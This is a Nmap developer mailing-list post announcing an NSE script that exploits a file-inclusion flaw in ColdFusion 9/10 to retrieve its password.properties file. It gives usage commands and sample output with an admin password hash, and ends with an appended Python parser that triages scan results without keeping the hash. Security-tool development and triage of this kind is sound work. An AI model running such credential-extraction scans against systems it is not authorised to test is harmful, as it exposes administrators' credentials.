Nmap Development mailing list archives

http-coldfusion-subzero - Extracts the credentials file through a 0day LFI vulnerability in ColdFusion 9/10


From: Paulino Calderon Pale <paulino () calderonpale com>
Date: Tue, 07 May 2013 16:38:02 -0500

description = [[
Attempts to retrieve the version, installation path and password.properties file in vulnerable ColdFusion 9/10 installations.

This is based on the exploit 'ColdSub-Zero.pyFusion v2'.
]]

---
-- @usage nmap -sV --script http-coldfusion-subzero <target>
-- @usage nmap -p80 --script http-coldfusion-subzero --script-args basepath=/cf/ <target>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-coldfusion-subzero:
-- |   absolute_path: C:\inetpub\wwwroot\CFIDE\adminapi\customtags
-- |   version: 9
-- |   password_properties: #Fri Mar 02 11:02:01 CST 2012
-- | rdspassword=
-- | password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0
-- |_encrypted=true
--
-- @xmloutput
-- <script id="http-coldfusion-subzero" output="&#xa; installation_path: C:\inetpub\wwwroot\CFIDE\adminapi\customtags&#xa; version: 9&#xa; password_properties: #Fri Mar 02 17:03:01 CST 2012&#xd;&#xa;rdspassword=&#xd;&#xa;password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0&#xd;&#xa;encrypted=true&#xd;&#xa;"><elem key="installation_path">C:\inetpub\wwwroot\CFIDE\adminapi\customtags</elem>
-- <elem key="version">9</elem>
-- <elem key="password_properties">#Fri Mar 02 17:03:01 CST 2012&#xd;&#xa;rdspassword=&#xd;&#xa;password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0&#xd;&#xa;encrypted=true&#xd;&#xa;</elem>
-- </script>
-- @args http-coldfusion-subzero.basepath Base path. Default: /.
--
---

Attachment: http-coldfusion-subzero.nse

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
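
For triaging scan reports that contain this script's results, the following added example (not part of the original post or of the NSE script) reads Nmap XML in the `@xmloutput` form shown above and lists affected hosts without copying the password hash into the report. The `<nmaprun>`/`<host>` wrapper and the 192.0.2.x addresses are constructed sample data; `findings` and `parse_properties` are hypothetical names.

```python
import xml.etree.ElementTree as ET
SCRIPT_ID = "http-coldfusion-subzero"

# Constructed sample: two hosts, one carrying the <script> element from the
# @xmloutput section of the post (output attribute shortened).
SAMPLE_XML = r"""<nmaprun>
<host><address addr="192.0.2.10" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="80"><state state="open"/>
<script id="http-coldfusion-subzero" output="(omitted)">
<elem key="installation_path">C:\inetpub\wwwroot\CFIDE\adminapi\customtags</elem>
<elem key="version">9</elem>
<elem key="password_properties">#Fri Mar 02 17:03:01 CST 2012&#xd;&#xa;rdspassword=&#xd;&#xa;password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0&#xd;&#xa;encrypted=true&#xd;&#xa;</elem>
</script></port></ports></host>
<host><address addr="192.0.2.11" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="80"><state state="open"/></port></ports></host>
</nmaprun>"""

def parse_properties(text):
    """Parse Java-style key=value lines, skipping blank and comment lines."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props

def findings(xml_text):
    """Return one record per port where the script reported results."""
    results = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            script = port.find(f"script[@id='{SCRIPT_ID}']")
            if script is None:
                continue
            elems = {e.get("key"): (e.text or "") for e in script.findall("elem")}
            props = parse_properties(elems.get("password_properties", ""))
            results.append({
                "host": addr,
                "port": int(port.get("portid")),
                "version": elems.get("version"),
                "install_path": elems.get("installation_path"),
                # Record only that a value was disclosed, never the value.
                "admin_hash_exposed": bool(props.get("password")),
                "rds_password_set": bool(props.get("rdspassword")),
                "encrypted": props.get("encrypted") == "true",
            })
    return results
```
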